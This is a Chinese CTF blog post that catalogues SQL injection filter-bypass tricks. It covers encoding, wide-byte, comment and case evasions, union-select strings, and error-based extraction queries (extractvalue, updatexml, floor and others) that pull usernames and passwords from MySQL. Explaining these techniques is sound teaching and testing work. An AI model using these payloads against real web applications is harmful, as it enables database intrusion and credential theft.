<!DOCTYPE html><html lang="zh-Hans"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>CTF中注入常见技巧的汇总 | K0rz3n's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">CTF中注入常见技巧的汇总</h1><a id="logo" href="/.">K0rz3n's Blog</a><p class="description">Shell-is-Only-the-Beginning</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Start</i></a><a href="/archives/"><i class="fa fa-archive"> Archiv</i></a><a href="/about/"><i class="fa fa-user"> Über</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">CTF中注入常见技巧的汇总</h1><div class="post-meta">Nov 21, 2017<span> | </span><span class="category"><a href="/categories/CTF/">CTF</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> Hits</span></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">Inhalte</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#导语"><span class="toc-number">1.</span> <span class="toc-text">导语</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#order-by-过滤"><span class="toc-number">2.</span> <span class="toc-text">order by 过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16进制绕过引号"><span class="toc-number">3.</span> <span class="toc-text">16进制绕过引号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#等于号过滤使用like-或者-in-绕过"><span class="toc-number">4.</span> <span class="toc-text">等于号过滤使用like 或者 in 绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#lt-，-gt-代替等于号构造真值"><span class="toc-number">5.</span> <span class="toc-text">&lt;，&gt; 代替等于号构造真值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#字符串相等绕过"><span class="toc-number">6.</span> <span class="toc-text">字符串相等绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sleep过滤"><span class="toc-number">7.</span> <span class="toc-text">sleep过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#其他逗号绕过（使用join"><span class="toc-number">8.</span> <span class="toc-text">其他逗号绕过（使用join)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#greatest-between-绕过-lt-gt-等比较符号"><span class="toc-number">9.</span> <span class="toc-text">greatest between 绕过&lt;,&gt; 等比较符号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#空格绕过"><span class="toc-number">10.</span> <span class="toc-text">空格绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常见的注释"><span class="toc-number">11.</span> <span class="toc-text">常见的注释</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用过滤删除绕过"><span class="toc-number">12.</span> <span class="toc-text">利用过滤删除绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#大小写绕过"><span class="toc-number">13.</span> <span class="toc-text">大小写绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#内联注释绕过"><span class="toc-number">14.</span> <span class="toc-text">内联注释绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#拆分字符串绕过"><span class="toc-number">15.</span> <span class="toc-text">+ - . 拆分字符串绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反引号绕过"><span class="toc-number">16.</span> <span class="toc-text">反引号绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#符号代替文字绕过"><span class="toc-number">17.</span> <span class="toc-text">符号代替文字绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#宽字节绕过"><span class="toc-number">18.</span> <span class="toc-text">宽字节绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#等价函数变量的绕过"><span class="toc-number">19.</span> <span class="toc-text">等价函数变量的绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数字的其他写法绕过空格"><span class="toc-number">20.</span> <span class="toc-text">数字的其他写法绕过空格</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#conv-10-36-代替字母"><span class="toc-number">21.</span> <span class="toc-text">conv(,10,36)代替字母</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常见的bypass"><span class="toc-number">22.</span> <span class="toc-text">常见的bypass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用count-返回数据行数"><span class="toc-number">23.</span> <span class="toc-text">使用count(*) 返回数据行数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#报错注入"><span class="toc-number">24.</span> <span class="toc-text">报错注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#限制与from的组合"><span class="toc-number">25.</span> <span class="toc-text">限制与from的组合</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#如果遇到表名或者字段名是保留字"><span class="toc-number">26.</span> <span class="toc-text">如果遇到表名或者字段名是保留字</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#在列名被过滤的情况下得到结果"><span class="toc-number">27.</span> <span class="toc-text">在列名被过滤的情况下得到结果</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#在查询时使用一个不存在的函数就能报错出数据库的名字"><span class="toc-number">28.</span> <span class="toc-text">在查询时使用一个不存在的函数就能报错出数据库的名字</span></a></li></ol></div></div><div class="post-content"><h2 id="导语"><a href="#导语" class="headerlink" title="导语"></a>导语</h2><p>打了这么长时间的CTF,也见了不少的SQL注入的题目，也该好好总结一下有哪些技巧了，持续更新（自己总结外加搜集，老鸟飘过，大牛勿喷）。。。</p>
<h2 id="order-by-过滤"><a href="#order-by-过滤" class="headerlink" title="order by 过滤"></a>order by 过滤</h2><p>两个都可以用来判断列数，但是两者是有区别的<br>1.order by 是你select 了几个就可以在那几个的范围里面变动，超过就报错。<br><a id="more"></a><br><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/orderby1.png" alt="orderby1"></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/orderby23.png" alt="orderby23"></p>
<p>into 就比较死板，必须是你select 了几个就要into 几个，少了多了都不行。而且必须是一行才可以所以必须要limit.（1.select into 本是一个备份内容的操作。2.@是一个变量符号）</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/intod.png" alt="intod"></p>
<p>2.order by 只能在 limit前使用,into 只能在limit 之后使用<br><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/order%20by%20%E7%9A%84%E9%A1%BA%E5%BA%8F.png" alt="orderby的顺序"><br><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/into%E7%9A%84%E9%A1%BA%E5%BA%8F.png" alt="into的顺序"></p>
<p>小结：order by 过滤了用into</p>
<h2 id="16进制绕过引号"><a href="#16进制绕过引号" class="headerlink" title="16进制绕过引号"></a>16进制绕过引号</h2><p>有些时候过滤了引号，导致字符串不能写入，我们可以用字符串的16进制形式绕过，这样就不需要引号了。还有hex()和unhex()这两个函数可以使用。<br><figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="built_in">where</span> table_name=<span class="string">"users"</span></span><br><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">where</span> table_name=<span class="number">0x7573657273</span></span><br></pre></td></tr></table></figure></p>
<h2 id="等于号过滤使用like-或者-in-绕过"><a href="#等于号过滤使用like-或者-in-绕过" class="headerlink" title="等于号过滤使用like 或者 in 绕过"></a>等于号过滤使用like 或者 in 绕过</h2><p>等号过滤用in或like 代替</p>
<pre><code>substr(password,1,1) in(&apos;p&apos;);
substr(password,1,1) like(&apos;p&apos;);
</code></pre><p>in 还能通过order by 指定顺序</p>
<pre><code>select * from users where id IN (3,6,9,1,2,5,8,7) order by field(id,3,6,9,1,2,5,8,7);
</code></pre><h2 id="lt-，-gt-代替等于号构造真值"><a href="#lt-，-gt-代替等于号构造真值" class="headerlink" title="&lt;，&gt; 代替等于号构造真值"></a>&lt;，&gt; 代替等于号构造真值</h2><p>or swords &gt; sw</p>
<p>or swords &lt; tw</p>
<p>or 1&lt;3 </p>
<h2 id="字符串相等绕过"><a href="#字符串相等绕过" class="headerlink" title="字符串相等绕过"></a>字符串相等绕过</h2><p>or ‘swords’ = ‘swords’</p>
<h2 id="sleep过滤"><a href="#sleep过滤" class="headerlink" title="sleep过滤"></a>sleep过滤</h2><p>可以用 benchmark   BENCHMARK(count,expr)<br>BENCHMARK()函数重复countTimes次执行表达式expr,执行的时间长了，也达到了sleep的作用。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">## 编码绕过 </span><br><span class="line">URLEncode编码，ASCII,HEX,unicode编码绕过</span><br><span class="line"></span><br><span class="line">1.URL编码：or 1=1即%6f%72%20%31%3d%31</span><br><span class="line"></span><br><span class="line">2.url双重编码; ?id=1%252f%252a\*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a\*/FROM%252f%252a\*/Users--+</span><br><span class="line"></span><br><span class="line">3.hex编码：见16进制绕过单引号</span><br><span class="line"></span><br><span class="line">4.ascii编码: SELECT FROM Users WHERE username = CHAR(101, 97, 105, 116)</span><br><span class="line"></span><br><span class="line">或者</span><br><span class="line"></span><br><span class="line">char(101)+char(97)+char(105)+char(116)</span><br><span class="line"></span><br><span class="line">5.unicode编码：</span><br></pre></td></tr></table></figure></p>
<p>一些unicode编码举例：<br>单引号：’<br>%u0027 %u02b9 %u02bc<br>%u02c8 %u2032<br>%uff07 %c0%27<br>%c0%a7 %e0%80%a7<br>空白：<br>%u0020 %uff00<br>%c0%20 %c0%a0 %e0%80%a0<br>左括号(:<br>%u0028 %uff08<br>%c0%28 %c0%a8<br>%e0%80%a8<br>右括号):<br>%u0029 %uff09<br>%c0%29 %c0%a9<br>%e0%80%a9<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">6.html 实体编码：SELECT <span class="keyword">FROM</span><span class="built_in"> Users </span>WHERE username = &amp;#39;admin&amp;#39;</span><br><span class="line"><span class="comment">## substr()的逗号绕过 </span></span><br><span class="line"><span class="keyword">from</span> 1 <span class="keyword">for</span> 1 代替 substr(,1,1)</span><br></pre></td></tr></table></figure></p>
<p>select * from pass where id=1 union select 1,2, substr((select username from users limit 0,1),1,1);</p>
<p>select * from pass where id=1 union select 1,2, substr((select username from users limit 0,1) from 1 for 1);<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">## limit 逗号绕过 </span><br><span class="line"></span><br><span class="line">limit <span class="number">1</span> offset <span class="number">0</span> 代替limit <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure></p>
<p>select * from pass where id=1 union select 1,2, substr((select username from users limit 1 offset 0),1,1);<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">还可以直接用 ```<span class="keyword">select</span> top <span class="number">1</span> <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> .....代替<span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure></p>
<h2 id="其他逗号绕过（使用join"><a href="#其他逗号绕过（使用join" class="headerlink" title="其他逗号绕过（使用join)"></a>其他逗号绕过（使用join)</h2><pre><code>select * from users union select 1,2,3;
select * from users union select * from (select 1)a join (select 2)b join (select 3)c;
</code></pre><p>NOTE : ‘using()’ can replace ‘on’ </p>
<h2 id="greatest-between-绕过-lt-gt-等比较符号"><a href="#greatest-between-绕过-lt-gt-等比较符号" class="headerlink" title="greatest between 绕过&lt;,&gt; 等比较符号"></a>greatest between 绕过&lt;,&gt; 等比较符号</h2><p>当我们盲注的时候，要用到比较符号，如果过滤了可以用greatest(x,y,z,..)绕过 返回的是他们的最大值<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=1 <span class="keyword">and</span> ascii(substr(database(),0,1))&gt;64</span><br></pre></td></tr></table></figure></p>
<p>改成<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=1 <span class="keyword">and</span> greatest(ascii(substr(database(),0,1)),64)=64</span><br></pre></td></tr></table></figure></p>
<p>当然这里的等于号可以改成in()</p>
<pre><code>SELECT * FROM `p_archives_3` WHERE `picsad` between 1113 and 1122
</code></pre><p>等同于</p>
<pre><code>SELECT * FROM `p_archives_3` WHERE `picsad` &gt;= 1113 and `picsad`&lt;=1122
</code></pre><p>你要保证picsad是数字类型的</p>
<h2 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h2><p>1.()<br>括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格<br>select(user())from dual where(1=1)and(2=2)<br>?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23</p>
<p>2./**/或者/*1*/</p>
<p>3.%0d %0a %0c %0b %a0</p>
<p>4.+</p>
<p>5.TAB</p>
<p>6.两个括号</p>
<p>7.把上面说的编一下码试试</p>
<p>8.select Afrom B 默认from后面必须是空格再加表名，因此为了不让你使用from可能正则表达式会检测后面的空格，我们可以用科学计数法绕过，因为1e0后面可以没有空格<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> A,<span class="number">1E0f</span>romB</span><br></pre></td></tr></table></figure></p>
<p>这里的逗号是两列的意思 1e0占了第二列</p>
<p>同样，上面的1E0可以用1.0代替</p>
<p>9.\N 绕过 原来一直不知道是绕过啥，后来请教了math1as师傅发现是绕过NULL,因为\N相当于NULL<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> pass <span class="keyword">where</span> <span class="keyword">id</span>=\Nunion <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>, <span class="keyword">greatest</span>((<span class="keyword">substr</span>((<span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">1</span> <span class="keyword">offset</span> <span class="number">0</span>),<span class="number">1</span>,<span class="number">1</span>)),<span class="string">'v'</span>)<span class="keyword">in</span>(<span class="string">'v'</span>);</span><br></pre></td></tr></table></figure></p>
<p>10.id 与from在之间的空格绕过</p>
<pre><code>select+id-1+1.from users;
select-id-1+3.from users;
</code></pre><p>注意：第二句得到的id将会是 -id+2</p>
<h2 id="常见的注释"><a href="#常见的注释" class="headerlink" title="常见的注释"></a>常见的注释</h2><p>1.–+</p>
<p>2.#</p>
<p>3.%23</p>
<p>4.– -</p>
<p>5.%00</p>
<p>6.` 单行或者多行注释（别名）</p>
<p>7./<em> </em>/ 单行或者多行注释</p>
<h2 id="利用过滤删除绕过"><a href="#利用过滤删除绕过" class="headerlink" title="利用过滤删除绕过"></a>利用过滤删除绕过</h2><p>比如说他过滤了/**/（将其删除）又过滤了select那么我们可以这么写<br>sel/**/ect.</p>
<p>意思就是被删除的可以加在另一个要删除的里面，这样不仅不会识别，删除后又还原了，实现绕过，这里面还包括双写被过滤字符的方法</p>
<h2 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h2><p>经常试试大小写混合比如 UnIOn sELecT….</p>
<h2 id="内联注释绕过"><a href="#内联注释绕过" class="headerlink" title="内联注释绕过"></a>内联注释绕过</h2><p>介绍一下什么是内联注释：/<em>!</em>/在其他数据库语言中是注释，但是在sql中却可以执行，为了sql提高语句的兼容性.<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">id=1<span class="comment">/*!UnIoN*/</span>+<span class="keyword">SeLeCT</span>+<span class="number">1</span>,<span class="number">2</span>,<span class="keyword">concat</span>(<span class="comment">/*!table_name*/</span>)+<span class="keyword">FrOM</span> <span class="comment">/*information_schema*/</span>.tables <span class="comment">/*!WHERE */</span>+<span class="comment">/*!TaBlE_ScHeMa*/</span>+<span class="keyword">like</span>+<span class="keyword">database</span>()<span class="comment">-- -</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*!50001from*/</span> 表示在mysql版本高于<span class="number">50001</span>也就是mysql5中可以执行这条命令</span><br></pre></td></tr></table></figure></p>
<h2 id="拆分字符串绕过"><a href="#拆分字符串绕过" class="headerlink" title="+ - . 拆分字符串绕过"></a>+ - . 拆分字符串绕过</h2><p>?id=1’ or ‘11+11’=’11+11’<br>“-“和”.”</p>
<h2 id="反引号绕过"><a href="#反引号绕过" class="headerlink" title="反引号绕过"></a>反引号绕过</h2><p>可以用来过空格和正则，特殊情况下还可以将其做注释符用(单行或多行注释)实际上是mysql别名的用法，详细见雨神的博客<br><a href="http://www.yulegeyu.com/2017/04/11/%E4%B8%BA%E4%BB%80%E4%B9%88-backtick-%E8%83%BD%E5%81%9A%E6%B3%A8%E9%87%8A%E7%AC%A6/" target="_blank" rel="noopener">http://www.yulegeyu.com/2017/04/11/%E4%B8%BA%E4%BB%80%E4%B9%88-backtick-%E8%83%BD%E5%81%9A%E6%B3%A8%E9%87%8A%E7%AC%A6/</a><br>select <code>version()</code></p>
<h2 id="符号代替文字绕过"><a href="#符号代替文字绕过" class="headerlink" title="符号代替文字绕过"></a>符号代替文字绕过</h2><p>1.&amp;&amp;代替and </p>
<p>2.||代替or</p>
<p>3.| 代替 xor</p>
<h2 id="宽字节绕过"><a href="#宽字节绕过" class="headerlink" title="宽字节绕过"></a>宽字节绕过</h2><p>简单的讲一下，一般当引号被过滤就会在引号前加一个\，将其转义失去作用，这样我们就不能闭合引号完成注入了。但是如果他的字符集设置为了双字节，也就是说两个字符可以代表一个中文的情况，那么我们就可以构造成一个中文字，\的url是%27我们在引号前写上%df，那么%df%27构成了中文的繁体运,引号就没有被过滤，成功绕过。当然不只是%df只要在那个字符集的范围内都可以。如%bf%27 %df%27 %aa%27</p>
<h2 id="等价函数变量的绕过"><a href="#等价函数变量的绕过" class="headerlink" title="等价函数变量的绕过"></a>等价函数变量的绕过</h2><p>1.hex()、bin() ==&gt; ascii()</p>
<p>2.sleep() ==&gt;benchmark()</p>
<p>这里补充一下:<br><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">在sqlsever 中用 waitfor <span class="keyword">delay</span></span><br><span class="line">在Oracle 中用 DBMS_PIPE.RECEIVE_MESSAGE()函数和CASEWHEN„<span class="keyword">THEN</span>„语句</span><br></pre></td></tr></table></figure></p>
<p>3.concat_ws()==&gt;group_concat()</p>
<p>4.mid()、substr() ==&gt; substring()</p>
<p>5.@@user ==&gt; user()</p>
<p>6.@@datadir ==&gt; datadir()</p>
<p>7.@@version ==&gt; version()</p>
<h2 id="数字的其他写法绕过空格"><a href="#数字的其他写法绕过空格" class="headerlink" title="数字的其他写法绕过空格"></a>数字的其他写法绕过空格</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=8E0union select 1,2,3,4,5,6,7,8,9,0</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=8.0union select 1,2,3,4,5,6,7,8,9,0</span><br></pre></td></tr></table></figure>
<p>注：E0是科学计数法</p>
<h2 id="conv-10-36-代替字母"><a href="#conv-10-36-代替字母" class="headerlink" title="conv(,10,36)代替字母"></a>conv(,10,36)代替字母</h2><p>conv(10,10,36)是大写的A<br>lower(conv(10,10,36/16s))小写的a</p>
<h2 id="常见的bypass"><a href="#常见的bypass" class="headerlink" title="常见的bypass"></a>常见的bypass</h2><p>1.id=1+(UnIoN)+(SelECT)+</p>
<p>2.id=1+(UnIoN+SeLeCT)+</p>
<p>3.id=1+(UnI)(oN)+(SeL)(EcT)</p>
<p>4.id=1+’UnI’’On’+’SeL’’ECT’ &lt;-MySQL only</p>
<p>5.id=1+’UnI’||’on’+SeLeCT’ &lt;-MSSQL only</p>
<h2 id="使用count-返回数据行数"><a href="#使用count-返回数据行数" class="headerlink" title="使用count(*) 返回数据行数"></a>使用count(*) 返回数据行数</h2><pre><code>select count(*) from users;
+----------+
| count(*) |
+----------+
|       13 |
+----------+
</code></pre><p>注意： 这里的行数只是真正的行数，不是最终的id 编号</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p>1.extractvalue 报错</p>
<pre><code>and extractvalue(1, concat(1, (select database() limit 0,1)))--+;
</code></pre><p>查表<br>    and extractvalue(1, concat(1,(select table_name from information_schema.tables limit 0,1)))–+;<br>查列<br>    and extractvalue(1, concat(1,(select column_name from information_schema.columns limit 0,1)))–+;<br>查数据<br>    and extractvalue(1, concat(1,(select password from users  limit 0,1)))–+;</p>
<p>2.UpdateXml报错</p>
<p>测试语句</p>
<pre><code>and 1=(updatexml(1,concat(0x3a,(select user())),1))
</code></pre><p>实际测试过程</p>
<pre><code>mysql&gt; select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 
</code></pre><p>3.运算数值的大小限制报错</p>
<pre><code>select exp(~(select*from(select user())a))；
ERROR 1690 (22003): DOUBLE value is out of range in &apos;exp(~((select &apos;root@localhost&apos; from dual)))&apos;
</code></pre><p>这个函数是计算e的n次方，~是按位取补，exp计算的次方数是有限制的，我们如果给他传一个字符串，php 的弱类型就会当成是0这样取反之后就超了，报错</p>
<p>类似的还有：</p>
<pre><code>select !(select*from(select user())x)-~0;
</code></pre><p>这里注意一下：</p>
<p>进行嵌套查询的时候子查询出来的的结果是作为一个派生表来进行上一级的查询的，所以子查询的结果必须要有一个别名，一般是as+别名 但是as 可以省略。</p>
<p>4.floor()</p>
<pre><code>select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
</code></pre><p>5.geometrycollection()</p>
<pre><code>select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
</code></pre><p>6.multipoint()</p>
<pre><code>select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
</code></pre><p>7.polygon()</p>
<pre><code>select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
</code></pre><p>8.linestring()</p>
<pre><code>select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
</code></pre><p>9.multilinestring()</p>
<pre><code>select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
</code></pre><p>10.multipolygon()</p>
<pre><code>select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
</code></pre><h2 id="限制与from的组合"><a href="#限制与from的组合" class="headerlink" title="限制与from的组合"></a>限制与from的组合</h2><p>用 from. 代替 from </p>
<h2 id="如果遇到表名或者字段名是保留字"><a href="#如果遇到表名或者字段名是保留字" class="headerlink" title="如果遇到表名或者字段名是保留字"></a>如果遇到表名或者字段名是保留字</h2><p>这个时候最好使用点号连接表名和字段名，或者直接使用反引号包起来</p>
<p>##利用mysql 的特性<br>1.当使用自定义的不存在函数的时候就会报错显示出库的名字</p>
<pre><code>mysql&gt; select * from users where id =a()；
ERROR 1305 (42000): FUNCTION security.a does not exist
</code></pre><p>2.当查找重复的列的是时候就会报错</p>
<pre><code>pro_id=2 union select * from (select * from product_2017ctf as A join product_2017ctf as B using(pro_id)) as C
Duplicate column name &apos;pro_name&apos; 
</code></pre><p>注意： MySQL是兼容两个列相同的但是却不兼容在这个基础上再select * from </p>
<h2 id="在列名被过滤的情况下得到结果"><a href="#在列名被过滤的情况下得到结果" class="headerlink" title="在列名被过滤的情况下得到结果"></a>在列名被过滤的情况下得到结果</h2><p>要在不出现字段名的情况下查出内容，将一个虚拟表和当前表联合起来即可</p>
<pre><code>pro_id=-1 union select 1,a.4,3,4 from (select 1,2,3,4 from dual union select * from product_2017ctf)a limit 3,1; 
</code></pre><p>##在函数名与括号间添加空格或者注释绕过函数过滤</p>
<p>例如：</p>
<p>concat/**/()</p>
<h2 id="在查询时使用一个不存在的函数就能报错出数据库的名字"><a href="#在查询时使用一个不存在的函数就能报错出数据库的名字" class="headerlink" title="在查询时使用一个不存在的函数就能报错出数据库的名字"></a>在查询时使用一个不存在的函数就能报错出数据库的名字</h2><p>select password from contents where id=a()<br>这个a()是不存在的函数，结果如下</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/mysql_trick.png" alt></p>
</div><div class="tags"><a href="/tags/sql/">sql</a></div><div class="post-nav"><a class="pre" href="/2017/11/28/php命令行备忘/">php命令行的使用</a><a class="next" href="/2017/11/04/kali/">kali源以及虚拟机工具安装</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="https://www.k0rz3n.com"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Kategorien</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/APT/">APT</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/C-C/">C&C</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Kerberos/">Kerberos</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/learning/">learning</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/php/">php</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web安全/">web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/wireshark/">wireshark</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/备忘/">备忘</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/备忘-笔记/">备忘 笔记</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/学习思考/">学习思考</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具/">工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具使用/">工具使用</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/开发/">开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/渗透测试/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞分析/">漏洞分析</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞研究/">漏洞研究</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/环境搭建/">环境搭建</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/编程/">编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/翻译/">翻译</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/论文/">论文</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/随笔/">随笔</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"><a href="/tags/PHP-备忘-笔记/" style="font-size: 15px;">PHP 备忘 笔记</a> <a href="/tags/工具-渗透测试/" style="font-size: 15px;">工具 渗透测试</a> <a href="/tags/备忘-反向代理-配置/" style="font-size: 15px;">备忘 反向代理 配置</a> <a href="/tags/开发-Github-备忘/" style="font-size: 15px;">开发 Github 备忘</a> <a href="/tags/配置-备忘/" style="font-size: 15px;">配置 备忘</a> <a href="/tags/Linux-渗透测试-备忘/" style="font-size: 15px;">Linux 渗透测试 备忘</a> 